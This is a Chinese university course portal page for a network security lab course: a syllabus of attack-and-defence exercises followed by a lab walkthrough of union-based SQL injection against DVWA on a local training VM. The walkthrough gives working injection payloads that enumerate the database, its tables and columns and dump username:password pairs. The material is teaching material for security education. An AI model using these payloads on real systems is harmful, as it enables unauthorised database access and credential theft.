课程门户-章节详情

网络安全运行与维护

李成海

1 §1 实训项目1 搭建网络安全实训环境
- 1.1 导入(第1次课)
- 1.2 §1.1 靶场：虚拟机CentOS7.8(192.168.112.100)
  - 1.2.1 (1)DVWA-master
  - 1.2.2 (2)sqli-labs(第3次课)
  - 1.2.3 (3)sqlmap
  - 1.2.4 (4)login, loginPHP
  - 1.2.5 (5)Firefox, Hackbar
  - 1.2.6 2022.09.07作业1 “未知攻，焉知防”
  - 1.2.7 2022.09.14作业3“拖库—爆库、爆表、爆字段、爆数据”
  - 1.2.8 Q&A-1(作业批改、辅导答疑)
- 1.3 §1.2 Burp(第2次课)
  - 1.3.1 2022.09.08作业2 “工欲善其事，必先利其器”
  - 1.3.2 Q&A-2(作业批改、辅导答疑)
- 1.4 §1.3 Python
  - 1.4.1 Python的Anaconda3集成开发环境
- 1.5 §1.4 Kali
  - 1.5.1 2022.09.15作业4“永恒之蓝漏洞”
- 1.6 §1.5 Wireshark
- 1.7 2022.09.15腾讯会议答疑
2 §2 实训项目2 SQL注入
- 2.1 ■(1)SQL注入联合查询(第3次课)
  - 2.1.1 附件：联合查询SQL注入模板
  - 2.1.2 ■模板
- 2.2 (2)SQL注入(PDF文档)
  - 2.2.1 ①更新Kali系统中的Firefox浏览器并安装浏览器插件
  - 2.2.2 (2)部署sqli-labs学习环境
  - 2.2.3 (3)sqli-labs使用教学
  - 2.2.4 (4)实战：SQL注入联合查询-获取数据库数据
- 2.3 ■(3)部署loginPHP网站
  - 2.3.1 ●SQL注入测试
  - 2.3.2 ●创建数据库、部署简单登录网站loginPHP、进行SQL注入测试(2019.12.17)
  - 2.3.3 ①login.php
  - 2.3.4 ②loginAuth.php
  - 2.3.5 ③loginAuth1.php
  - 2.3.6 ④success.php
  - 2.3.7 ⑤failure.php
  - 2.3.8 ■⑥(loginPHP网站SQL注入)结果截图
- 2.4 (4)DVWA的SQL Injection
- 2.5 (5)拓展视野：靶场SQL注入
3 §3 实训项目3 通过SQLmap进行SQL注入并获得后台管理员账号和密码
- 3.1 (1)安装DVWA
- 3.2 (2)安装SQLmap
- 3.3 (3)※实战 SQLmap探测DVWA的SQL注入漏洞
- 3.4 (4)结果截图(SQLmap拖库)
- 3.5 (5)使用BurpSuite进行POST方式的SQL注入
- 3.6 ■附安装DVWA-1.9(完整版)
4 §4 实训项目4 使用永恒之蓝漏洞对Win7进行渗透
- 4.1 (1)获取Win7系统shell、开启远程桌面
- 4.2 (2)截图
- 4.3 (3)Metasploit渗透测试
- 4.4 (4)使用msf渗透攻击XP并进行远程关机
5 §5 实训项目5 安装Kali渗透测试系统
- 5.1 BT到Kali的发展史
- 5.2 (1)安装Kali
- 5.3 (2)安装BT5
- 5.4 ■附安装Kali、BT5、DVWA、SQLmap、Win7
6 §6 实训项目6 配置Kali渗透测试系统
- 6.1 (1)安装Kali渗透测试系统
- 6.2 (2)SSH连接Kali
- 6.3 (3)※ettercap抓取FTP登录账号和密码
- 6.4 (4)结果截图(ettercap抓取FTP登录账号和密码)
7 §7 实训项目7 ARP协议安全攻防
- 7.1 (1)ARP协议安全攻防(试题)
- 7.2 (2)※ARP协议安全攻防
- 7.3 (4)实训防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
- 7.4 (3)练习：防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
- 7.5 演示视频 arpsproof+etthercap实施中间人攻击
8 §8 实训项目8 暴力破解
- 8.1 (1)※实战-通过暴力破解Web登录界面获得管理员权限
- 8.2 (2)字典工具pydictor.py
- 8.3 (3)hydra和xhydra
- 8.4 (4)Medusa
- 8.5 (5)离线破解md5值和shadow加密文件
- 8.6 (6)Brute Force(DVWA)
- 8.7 (7)Burp Suite(Windows)
- 8.8 (8)Burp Suite(Kali)
9 §9 实训项目9 防止黑客攻破Discuz论坛并拿下数据库
- 9.1 (1)防止黑客攻破Discuz论坛并拿下数据库
- 9.2 (2)CentOS6.5-desktop及MySQL
10 §10 实训项目10作业 Wireshark抓取Telnet明文包
- 10.1 (1)※Wireshark抓取Telnet明文包(CentOS6.5)
- 10.2 (2)结果截图(Wireshark抓取Telnet明文包)
- 10.3 (3)常用协议分析(ARP、ICMP、TCP、HTTP、DNS)
11 §11 实训项目11 基于文件上传漏洞获得网站shell权限
- 11.1 ●文件上传(PDF文档)
- 11.2 (1)基于文件上传漏洞获得网站shell权限
- 11.3 (2)本地文件包含漏洞截图
- 11.4 (3)课程资料
- 11.5 (4)课外编辑器KindEditor文件上传漏洞
12 §12 实训项目12 Nmap
- 12.1 (1)安全工具
- 12.2 (2)Nmap
- 12.3 (3)网络空间安全(系统渗透测试篇)
- 12.4 (4)信息收集
13 §13 实训项目13 File Inclusion文件包含漏洞及防御
- 13.1 (1)本地文件包含
- 13.2 (2)远程文件包含
14 §14 实训项目14 XSS跨站脚本攻击
- 14.1 (1)窃取用户Cookie信息保存到远程服务器
- 14.2 (2)反射型XSS攻击劫持用户浏览器
- 14.3 (3)存储型XSS窃取用户信息
15 §15 实训项目15 缓冲区溢出漏洞
16 §16 实训项目16 搭建蜜罐系统捕捉黑客操作步骤
17 考核
- 17.1 平时成绩(40%+30%)
- 17.2 期末考试(30%)
18 网络1901-04期末考试(2020-2021-2)
- 18.1 试题1：damicms
- 18.2 试题2：sqli-labs
- 18.3 试题3：dvwa
- 18.4 试题4：loginPHP
19 校外卷重修-B05123网络安全运行与维护复习
- 19.1 (1)loginPHP
- 19.2 (2)Python编程

(4)DVWA的SQL Injection

DVWA的SQL Injection

http://192.168.112.100/DVWA-master/login.php

Username：admin

Password：password

单击“SQL Injection”(SQL注入)

http://192.168.112.100/DVWA-master/vulnerabilities/sqli/

User ID: 1

(1)注入点：

http://192.168.112.100/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#

(1)?id=1 #注入点

1.判断数字型/字符型

(2)?id=1'

?id=1 and 1=2 #无显示

?id=1 and 1=1 #正常，说明是数字型

否则：

?id=1' #报错说明单引号没有过滤，存在SQL注入漏洞

?id=1\ #报错说明单引号闭合

2.猜解字段数

(3)?id=1' order by 3--+ #显示说明至少3个字段

?id=1' order by 4--+ #报错说明3个字段

(4)爆出字段的显示位置(回显位)

?id=-1' union select 1,2,3--+ #

3.爆库

(5)获取数据库名称

?id=-1' union select 1,version(),3--+

#显示数据库版本：5.5.68-MariaDB

4.爆表

(6)列出当前数据库中所有表的名称

?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()--+

#当前数据库：security，表名：emails,referers,uagents,users

5.爆字段

(7)获取users表中的字段名

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security'--+

#数据库security、表users的字段名：id,username,password

得到：

数据库：security

表：users

字段：id,username,password

6.爆数据

(8)获取users表中的用户名、密码字段中的值

?id=-1' union select 1,database(),group_concat(username,0x3a,password,0x3c,0x68,0x72,0x2f,0x3e) from users--+

或

?id=-1' union select 1,database(),group_concat(username,0x3a,password,0x3c,0x68,0x72,0x2f,0x3e) from users--+

#用户名:密码：

Dumb:Dumb

......

,admin4:admin4

DVWA的SQL Injection

图片预览